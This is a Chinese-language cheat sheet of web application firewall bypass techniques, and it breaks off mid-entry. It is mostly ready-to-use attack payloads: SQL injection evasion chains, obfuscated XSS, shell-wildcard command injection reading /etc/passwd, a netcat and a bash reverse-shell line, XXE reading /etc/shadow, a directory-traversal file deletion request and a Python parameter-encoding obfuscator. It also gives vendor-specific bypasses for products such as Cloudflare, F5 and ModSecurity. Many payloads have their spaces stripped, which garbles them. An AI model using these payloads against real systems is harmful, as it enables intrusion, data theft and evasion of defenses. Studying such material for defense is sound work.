乾貨|各種WAF繞過手法學習
0X00Fuzz/爆破
fuzz字典
1.Seclists/Fuzzing
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
2.Fuzz-DB/Attack
https://github.com/fuzzdb-project/fuzzdb/tree/master/attack
3.Other Payloads 可能會被ban ip,小心為妙。
https://github.com/foospidy/payloads
0X01正則繞過
多少waf 使用正則匹配。
黑名單檢測/bypass
Case: SQL 注入
• Step 1:
過濾關鍵詞: and, or, union
可能正則: preg_match('/(and|or|union)/i', $id)
被攔截的語句: unionselectuser,passwordfromusers
bypass語句:1|| (selectuserfromuserswhereuser_id =1) ='admin'
• Step 2:
過濾關鍵詞: and, or, union, where
被攔截的語句: 1 || (selectuserfromuserswhereuser_id =1) ='admin'
bypass語句:1|| (selectuserfromuserslimit1) ='admin'
• Step 3:
過濾關鍵詞: and, or, union, where, limit
被攔截的語句: 1 || (selectuserfromuserslimit1) ='admin'
bypass語句:1|| (selectuserfromusersgroupbyuser_idhavinguser_id =1) ='admin'
• Step 4:
過濾關鍵詞: and, or, union, where, limit, group by
被攔截的語句: 1 || (selectuserfromusersgroupbyuser_idhavinguser_id =1) ='admin'
bypass語句:1|| (selectsubstr(group_concat(user_id),1,1)userfromusers) =1
• Step 5:
過濾關鍵詞: and, or, union, where, limit, group by,select
被攔截的語句:1|| (selectsubstr(gruop_concat(user_id),1,1)userfromusers) =1
bypass語句:1||1=1intooutfile'result.txt'
bypass語句:1||substr(user,1,1) ='a'
• Step 6:
過濾關鍵詞:and,or,union, where, limit, group by, select, '
被攔截的語句:1|| (select substr(gruop_concat(user_id),1,1) user from users) =1
bypass語句:1|| user_id isnotnull
bypass語句:1|| substr(user,1,1) =0x61
bypass語句:1|| substr(user,1,1) = unhex(61)
• Step 7:
過濾關鍵詞:and,or, union, where, limit, groupby, select,', hex
被攔截的語句: 1 || substr(user,1,1) = unhex(61)
bypass語句: 1 || substr(user,1,1) = lower(conv(11,10,36))
• Step 8:
過濾關鍵詞:and,or, union, where, limit, groupby, select,', hex, substr
被攔截的語句: 1 || substr(user,1,1) = lower(conv(11,10,36))
bypass語句: 1 || lpad(user,7,1)
• Step 9:
過濾關鍵詞:and,or, union, where, limit, groupby, select,', hex, substr, white space
被攔截的語句: 1 || lpad(user,7,1)
bypass語句: 1%0b||%0blpad(user,7,1)
0X02混淆/編碼
1. 大小寫
標準:<script>alert()</script>
Bypassed:<ScRipT>alert()</sCRipT>
標準: SELECT * FROM all_tables WHERE OWNER ='DATABASE_NAME'
Bypassed: sELecT * FrOm all_tables whERe OWNER ='DATABASE_NAME'
2. URL 編碼
被阻斷語句: <svG/x=">"/oNloaD=confirm()//
Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F
被阻斷語句: uNIoN(sEleCT1,2,3,4,5,6,7,8,9,10,11,12)
Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29
3. Unicode 編碼
標準: <marquee onstart=prompt()>
混淆: <marquee onstart=\u0070r\u06f\u006dpt()>
被阻斷語句:/?redir=http://google.com
Bypassed:/?redir=http://google。com (Unicode 替代)
被阻斷語句: <marqueeloop=1onfinish=alert()>x
Bypassed: <marqueeloop=1onfinish=alert︵1)>x (Unicode 替代)
TIP: 檢視這些說明thisandthisreportsonHackerOne. :)
4. HTML 實體編碼
標準: "><imgsrc=xonerror=confirm()>
Encoded: "><img src=x onerror=confirm()> (General form)
Encoded: "><img src=x onerror=confirm()> (Numeric reference)
5. 混合編碼
Sometimes, WAF rules often tendtofilteroutaspecifictypeof encoding.
Thistypeof filters canbebypassed by mixed encoding payloads.
Tabsandnewlines furtheraddtoobfuscation.
混淆:
<AHREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
7. 雙重URL編碼
這個需要服務端多次解析了url編碼
標準: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\
混淆: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\
標準:<script>alert()</script>
混淆: %253Cscript%253Ealert()%253C%252Fscript%253E
8. 萬用字元使用
用於linux命令語句注入,通過shell萬用字元繞過
標準: /bin/cat/etc/passwd
混淆: /???/??t /???/??ss??
Used chars:/ ? t s
標準: /bin/nc127.0.0.11337
混淆: /???/n?21307064331337
Used chars:/ ? n [0-9]
9. 動態payload 生成
標準:<script>alert()</script>
混淆:<script>eval('al'+'er'+'t()')</script>
標準:/bin/cat /etc/passwd
混淆:/bi'n'''/c''at' /e'tc'/pa''ss'wd
Bash allows path concatenationforexecution.
標準: <iframe/onload='this["src"]="javascript:alert()"';>
混淆: <iframe/onload='this["src"]="jav"+"as	cr"+"ipt:al"+"er"+"t()"';>
9. 垃圾字元
Normal payloads get filtered out easily.
Adding some junk chars helps avoid detection (specific cases only).
They often help in confusing regex based firewalls.
標準:<script>alert()</script>
混淆:<script>+-+-1-+-+alert(1)</script>
標準:<BODYonload=alert()>
混淆:<BODYonload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>
NOTE:上述語句可能會破壞正則的匹配,達到繞過。
標準: <a href=javascript;alert()>ClickMe
Bypassed: <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe
10. 插入換行符
部分waf可能會對換行符沒有匹配
標準:<iframesrc=javascript:confirm(0)">
混淆:<iframesrc="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">
11. 未定義變數
bash 和perl執行指令碼中加入未定義變數,干擾正則。
TIP:隨便寫個不存在的變數就好。
$aaaa,$sdayuhjbsad,$dad2ed
都可以。
Level1Obfuscation:Normal
標準:/bin/cat/etc/passwd
混淆:/bin/cat$u /etc/passwd$u
Level2Obfuscation:Postion Based
標準:/bin/cat/etc/passwd
混淆: $u/bin$u/cat$u $u/etc$u/passwd$u
Level3Obfuscation:Random characters
標準:/bin/cat/etc/passwd
混淆: $aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff
一個精心製作的payload
$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf
12. Tab 鍵和換行符
大多數waf匹配的是空格不是Tab
標準:<IMGSRC="javascript:alert();">
Bypassed:<IMGSRC=" javascript:alert();">
變形:<IMGSRC=" jav ascri pt:alert ();">
標準: http://test.com/test?id=1 union select 1,2,3
標準: http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3
標準:<iframesrc=javascript:alert(1)></iframe>
混淆:
<iframesrc=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
13. Token Breakers(翻譯不了 看起來說的就是sql注入閉合)
Attacks on tokenizers attempt to break the logic of splitting a request into tokens with thehelpoftoken breakers.
Token breakersaresymbols thatallowaffecting the correspondencebetweenanelementofastringanda certain token,andthus bypasssearchbysignature.
However, the request must still remain validwhileusingtoken-breakers.
Case: Unknown Token for the Tokenizer
Payload: ?id=‘-sqlite_version() UNIONSELECTpasswordFROMusers--
Case:UnknownContextforthe Parser (Noticethe uncontexted bracket)
Payload1: ?id=123);DROPTABLEusers--
Payload2: ?id=1337)INTOOUTFILE‘xxx’--
TIP:更多payload可以看這裡cheat sheet.
14. 其他格式混淆
許多web應用程式支援不同的編碼型別(如下表)
混淆成伺服器可解析、waf不可解析的編碼型別
Case:IIS
IIS6, 7.5, 8and10 (ASPXv4.x) 允許IBM037字元
可以傳送編碼後的引數名和值
原始請求:
POST/sample.aspx?id1=somethingHTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 41
id2='union allselect*fromusers--
混淆請求 + URL Encoding:
POST/sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87HTTP/1.1
HOST: victim.com
Content-Type: application/x-www-form-urlencoded; charset=ibm037
Content-Length: 115
%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60
TIP:可以使用這個小指令碼來轉化編碼
importurllib.parse, sys
fromargparseimportArgumentParser
lackofart ='''
OBFUSCATOR
'''
defparamEncode(params="", charset="", encodeEqualSign=False, encodeAmpersand=False, urlDecodeInput=True, urlEncodeOutput=True):
result =""
equalSign ="="
ampersand ="&"
if'='and'&'inparams:
ifencodeEqualSign:
equalSign = equalSign.encode(charset)
ifencodeAmpersand:
ampersand = ampersand.encode(charset)
params_list = params.split("&")
forparam_pairinparams_list:
param, value = param_pair.split("=")
ifurlDecodeInput:
param = urllib.parse.unquote(param)
value = urllib.parse.unquote(value)
param = param.encode(charset)
value = value.encode(charset)
ifurlEncodeOutput:
param = urllib.parse.quote_plus(param)
value = urllib.parse.quote_plus(value)
ifresult:
result += ampersand
result += param + equalSign + value
else:
ifurlDecodeInput:
params = urllib.parse.unquote(params)
result = params.encode(charset)
ifurlEncodeOutput:
result = urllib.parse.quote_plus(result)
returnresult
defmain():
print(lackofart)
parser = ArgumentParser('python3 obfu.py')
parser._action_groups.pop()
# A simple hack to have required arguments and optional arguments separately
required = parser.add_argument_group('Required Arguments')
optional = parser.add_argument_group('Optional Arguments')
# Required Options
required.add_argument('-s','--str', help='String to obfuscate', dest='str')
required.add_argument('-e','--enc', help='Encoding type. eg: ibm037, utf16, etc', dest='enc')
# Optional Arguments (main stuff and necessary)
optional.add_argument('-ueo', help='URL Encode Output', dest='ueo', action='store_true')
optional.add_argument('-udi', help='URL Decode Input', dest='udi', action='store_true')
args = parser.parse_args()
ifnotlen(sys.argv) >1:
parser.print_help()
quit()
print('Input: %s'% (args.str))
print('Output: %s'% (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo)))
if__name__ =='__main__':
main()
伺服器資訊 | 可用編碼 | 說明 |
---|---|---|
Nginx, uWSGI-Django-Python3 | IBM037, IBM500, cp875, IBM1026, IBM273 | 對引數名和引數值進行編碼 伺服器會對引數名和引數值均進行url解碼 需要對等號和& and進行編碼(不進行url編碼) |
Nginx, uWSGI-Django-Python2 | IBM037, IBM500, cp875, IBM1026, utf-16, utf-32, utf-32BE, IBM424 | 對引數名和引數值進行便慢慢 伺服器會對引數名和引數值均進行url解碼 等號和&符號不應該以任何方式編碼。 |
Apache-TOMCAT8-JVM1.8-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 | 引數名按原始格式(可以像往常一樣使用url編碼) Body 不論是否經過url編碼均可 等號和&符號不應該以任何方式編碼 |
Apache-TOMCAT7-JVM1.6-JSP | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM297, IBM420, IBM424, IBM-Thai, IBM871, cp1025 | 引數名按原始格式(可以像往常一樣使用url編碼) Body 不論是否經過url編碼均可 等號和&符號不應該以任何方式編碼 |
IIS6, 7.5, 8, 10 -ASPX (v4.x) | IBM037, IBM500, IBM870, cp875, IBM1026, IBM01047, IBM01140, IBM01141, IBM01142, IBM01143, IBM01144, IBM01145, IBM01146, IBM01147, IBM01148, IBM01149, utf-16, unicodeFFFE, utf-32, utf-32BE, IBM273, IBM277, IBM278, IBM280, IBM284, IBM285, IBM290, IBM297, IBM420,IBM423, IBM424, x-EBCDIC-KoreanExtended, IBM-Thai, IBM871, IBM880, IBM905, IBM00924, cp1025 | 引數名按原始格式(可以像往常一樣使用url編碼) Body 不論是否經過url編碼均可 等號和&符號不應該以任何方式編碼 |
0X04HTTP 引數汙染
手法
這種攻擊方法基於伺服器如何解釋具有相同名稱的引數
可能造成bypass的情況:
伺服器使用最後接收到的引數,WAF只檢查第一個引數
伺服器將來自類似引數的值聯合起來,WAF單獨檢查它們
下面是相關伺服器對引數解釋的比較
環境 | 引數解析 | 示例 |
---|---|---|
ASP/IIS | 用逗號連線 | par1=val1,val2 |
JSP, Servlet/Apache Tomcat | 第一個引數是結果 | par1=val1 |
ASP.NET/IIS | 用逗號連線 | par1=val1,val2 |
PHP/Zeus | 最後一個引數是結果 | par1=val2 |
PHP/Apache | 最後一個引數是結果 | par1=val2 |
JSP, Servlet/Jetty | 第一個引數是結果 | par1=val1 |
IBM Lotus Domino | 第一個引數是結果 | par1=val1 |
IBM HTTP Server | 最後一個引數是結果 | par1=val2 |
mod_perl, libapeq2/Apache | 第一個引數是結果 | par1=val1 |
Oracle Application Server 10G | 第一個引數是結果 | par1=val1 |
Perl CGI/Apache | 第一個引數是結果 | par1=val1 |
Python/Zope | 第一個引數是結果 | par1=val1 |
IceWarp | 返回一個列表 | [‘val1’,’val2’] |
AXIS 2400 | 最後一個引數是結果 | par1=val2 |
DBMan | 由兩個波浪號連線起來 | par1=val1~~val2 |
mod-wsgi (Python)/Apache | 返回一個列表 | ARRAY(0x8b9058c) |
0X05瀏覽器的缺陷
Charset Bugs:
可以嘗試 修改 charset headerto更高的 Unicode (eg. UTF-32)
當網站解碼的時候,觸發payload
Example request:
GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept-Charset:utf-32; q=0.5<
Accept-Language:en-US,en;q=0.5
Accept-Encoding:gzip,deflate
當站點載入時,將其編碼為我們設定的UTF-32編碼,然後由於頁面的輸出編碼為UTF-8,將其呈現為:"<script>alert (1) </ script>
從而觸發xss
完整url編碼後的 payload:
%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
Null 空位元組
空位元組通常用作字串終止符
Payload 示例:
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
標準:<ahref="javascript:alert()">
混淆:<ahref="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>
變形:<a0x00href="javascript:alert(1)">clickme</a>
解析錯誤
RFC 宣告節點名不可以由空白起始
但是我們可以使用特殊字元 ` %, //, !, ?`, etc.
例子:
<//style=x:expression\28write(1)\29>- Works upto IE7 (Source)
<!--[if]><script>alert(1)</script -->- Works upto IE9 (Reference)
<?xml-stylesheet type="text/css"?><rootstyle="x:expression(write(1))"/>- Works in IE7 (Reference)
<%div%20style=xss:expression(prompt(1))>- Works Upto IE7
Unicode 分隔符
-
每個瀏覽器有不同的分隔分隔符
@Masato Kinugawafuzz 後發現如下
IExplorer: 0x09, 0x0B, 0x0C, 0x20, 0x3B
Chrome: 0x09, 0x20, 0x28, 0x2C, 0x3B
Safari: 0x2C, 0x3B
FireFox: 0x09, 0x20, 0x28, 0x2C, 0x3B
Opera: 0x09, 0x20, 0x2C, 0x3B
Android:0x09,0x20,0x28,0x2C,0x3B
示例
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>pwn3d
使用其他非典型等效語法結構替換
找的waf開發人員沒有注意到的語句進行攻擊
一些WAF開發人員忽略的常見關鍵字:
-
JavaScript functions:
-
window
-
parent
-
this
-
self
-
Tag attributes:
-
onwheel
-
ontoggle
-
onfilterchange
-
onbeforescriptexecute
-
ondragstart
-
onauxclick
-
onpointerover
-
srcdoc
SQL Operators
lpad
lpad(string, padded_length, [ pad_string ] ) lpad函式從左邊對字串使用指定的字元進行填充
lpad('tech',7); 將返回' tech'
lpad('tech',2); 將返回'te'
lpad('tech',8,'0'); 將返回'0000tech'
lpad('tech on the net',15,'z'); 將返回'tech on the net'
lpad('tech on the net',16,'z'); 將返回'ztech on the net
field
FIELD(str,str1,str2,str3,...)
返回的索引(從1開始的位置)的str在str1,str2,STR3,...列表中。如果str沒有找到,則返回0。
+---------------------------------------------------------+
|FIELD('ej','Hej','ej','Heja','hej','foo') |
+---------------------------------------------------------+
|2|
+---------------------------------------------------------+
bit_count
二進位制數中包含1的個數。BIT_COUNT(10);因為10轉成二進位制是1010,所以該結果就是2
示例payloads:
Case: XSS
<script>window['alert'](0)</script>
<script>parent['alert'](1)</script>
<script>self['alert'](2)</script>
Case: SQLi
SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);
1%0b||%0bLPAD(USER,7,1)
可以使用許多替代原生JavaScript的方法:
JSFuck
JJEncode
XChars.JS
濫用SSL/TLS密碼:
很多時候,伺服器可以接收各種SSL/TLS密碼和版本的連線。
初始化到waf不支援的版本
找出waf支援的密碼(通常WAF供應商文件對此進行了討論)。
找出伺服器支援的密碼(SSLScan這種工具可以幫助到你)。
找出伺服器支援但waf不支援的
Tool:abuse-ssl-bypass-waf
濫用 DNS 記錄:
-
找到雲waf後的源站
TIP:一些線上資源IP History和DNS Trails
Tool:bypass-firewalls-by-DNS-history
bash bypass-firewalls-by-DNS-history.sh-d<target>--checkall
請求頭欺騙
讓waf以為請求來自於內部網路,進而不對其進行過濾。
新增如下請求頭
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1
Google Dorks Approach:
應對已知WAF的繞過
搜尋語法:
Normal search:
+<wafname> waf bypass
Searching for specific version exploits:"<wafname> <version>" (bypass|exploit)
For specific type bypass exploits:"<wafname>" +<bypass type> (bypass|exploit)
OnExploit DB:site:exploit-db.com +<wafname> bypass
On0Day Inject0r DB:site:0day.today +<wafname> <type> (bypass|exploit)
OnTwitter:site:twitter.com +<wafname> bypass
OnPastebinsite:pastebin.com +<wafname> bypass
0X06 拓展Bypass姿勢
Airlock Ergon
SQLi Overlong UTF-8SequenceBypass(>= v4.2.4)by@Sec Consult
%C0%80'+union+select+col1,col2,col3+from+table+--+
AWS
SQLi Bypassby@enkaskal
";select*fromTARGET_TABLE--
XSS Bypassby@kmkz
<script>eval(atob(decodeURIComponent("payload")))//
Barracuda
Cross Site Scripting by@WAFNinja
<bodystyle="height:1000px"onwheel="alert(1)">
<divcontextmenu="xss">Right-Click Here<menuid="xss"onshow="alert(1)">
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
HTML Injection by@Global-Evolution
GET/cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US
Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
XSS Bypass by@0xInfection
<ahref=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere
Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit)by@xort
Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)by@xort
Cerber (WordPress)
Username Enumeration Protection Bypass by HTTP Verb Tampering by@ed0x21son
POSThost.comHTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
author=1
Protected Admin Scripts Bypass by@ed0x21son
http://host/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils
http://host/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar
REST API Disable Bypass by@ed0x21son
http://host/index.php/wp-json/wp/v2/users/
Citrix NetScaler
SQLi via HTTP Parameter Pollution (NS10.5) by@BGA Security
<soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<string>’ union select current_user,2#</string>
</soapenv:Body>
</soapenv:Envelope>
generic_api_call.pl
XSSby@NNPoster
http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
Cloudflare
HTML Injectionby@spyerror
<divstyle="background:url(/f#oo/;color:red/*/foo.jpg);">X
XSS Bypassby@c0d3g33k
<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>
XSS Bypassesby@Bohdan Korzhynskyi
<svgonload=prompt%26%230000000040document.domain)>
<svgonload=prompt%26%23x000000028;document.domain)>
xss'"><iframesrcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
1'"><img/src/onerror=.1|alert``>
XSS Bypassby@RakeshMane10
<svg/onload=alert()//
XSS Bypassby@ArbazKiraak
<ahref="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>`
XSS Bypass by@Ahmet Ümit
<--`<img/src=`onerror=confirm``> --!>
XSS Bypassby@Shiva Krishna
javascript:{alert`0`}
XSS Bypassby@Brute Logic
<basehref=//knoxss.me?
XSS Bypassby@RenwaX23(Chrome only)
<jid=xstyle="-webkit-user-modify:read-write"onfocus={window.onerror=eval}throw/0/+name>H</j>#x
RCE Payload Detection Bypassby@theMiddle
cat$u+/etc$u/passwd$u
/bin$u/bash$u<ip> <port>
";cat+/etc/passwd+#
Comodo
XSS Bypass by@0xInfection
<input/oninput='new Function`confir\u006d\`0\``'>
<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme
SQLi by@WAFNinja
0 union/**/select1,version(),@@datadir
DotDefender
Firewall disable by (v5.0) by@hyp3rlinx
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
<enabled>false</enabled>
Remote Command Execution (v3.8-5) by@John Dos
POST/dotDefender/index.cgiHTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15
Persistent XSS (v4.0) by@EnableSecurity
GET /c?a=<script>HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
<script>alert(1)</script>: aa
Keep-Alive: 300
R-XSS Bypass by@WAFNinja
<svg/onload=prompt(1);>
<isindexaction="javas&tab;cript:alert(1)"type=image>
<marquee/onstart=confirm(2)>
XSS Bypass by@0xInfection
<pdraggable=Trueondragstart=prompt()>alert
<bleh/ondragstart=	parent	['open']	()%20draggable=True>dragme
GET - XSS Bypass (v4.02) by @DavidK
/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E
<imgsrc="WTF"onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B
h%2Bn)(/0wn3d/.source)"/>
POST - XSS Bypass (v4.02) by@DavidK
<img src="WTF"onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/
.source)" />
clave
XSS (v4.02) by@DavidK
/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{
Fortinet Fortiweb
pcre_expression
unvaidated XSS by@Benjamin Mejri
/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0
CSP Bypass by@Binar10
POST Type Query
POST/<path>/login-app.aspxHTTP/1.1
Host: <host>
User-Agent: <any valid user agent string>
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: <the content length must be at least 2399 bytes>
var1=datavar1&var2=datavar12&pad=<random data to complete at least2399bytes>
GET Type Query
http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>
F5 ASM
XSS Bypass by@WAFNinja
<tablebackground="javascript:alert(1)"></table>
"/><marqueeonfinish=confirm(123)>a</marquee>
F5 BIG-IP
XSS Bypass by@WAFNinja
<bodystyle="height:1000px"onwheel="[DATA]">
<divcontextmenu="xss">Right-Click Here<menuid="xss"onshow="[DATA]">
<bodystyle="height:1000px"onwheel="prom%25%32%33%25%32%36x70;t(1)">
<divcontextmenu="xss">Right-Click Here<menuid="xss"onshow="prom%25%32%33%25%32%36x70;t(1)">
XSS Bypass by@Aatif Khan
<body style="height:1000px"onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menuid="xss"onshow="prom%25%32%33%25%32%36x70;t(1)“>
report_type
XSSby@NNPoster
https://host/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+
POST Based XXE by@Anonymous
POST/sam/admin/vpe2/public/php/server.phpHTTP/1.1
Host: bigip
Cookie: BIGIPAuthCookie=*VALID_COOKIE*
Content-Length: 143
<?xml version="1.0"encoding='utf-8'?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>
Directory Traversal by@Anastasios Monachos
Read Arbitrary File
/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd
Delete Arbitrary File
POST/tmui/Control/formHTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd
Content-Type: application/x-www-form-urlencoded
_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete
F5 FirePass
SQLi Bypass from@Anonymous
state=%2527+and+
(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
ModSecurity
RCE Payloads Detection Bypass for PL3by@theMiddle(v3.1)
;+$u+cat+/etc$u/passwd$u
RCE Payloads Detection Bypass for PL2by@theMiddle(v3.1)
;+$u+cat+/etc$u/passwd+\#
RCE Payloads for PL1 and PL2by@theMiddle(v3.0)
/???/??t+/???/??ss??
RCE Payloads for PL3by@theMiddle(v3.0)
/?in/cat+/et?/passw?
SQLi Bypassby@Johannes Dahse(v2.2)
0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
SQLi Bypassby@Yuri Goltsev(v2.2)
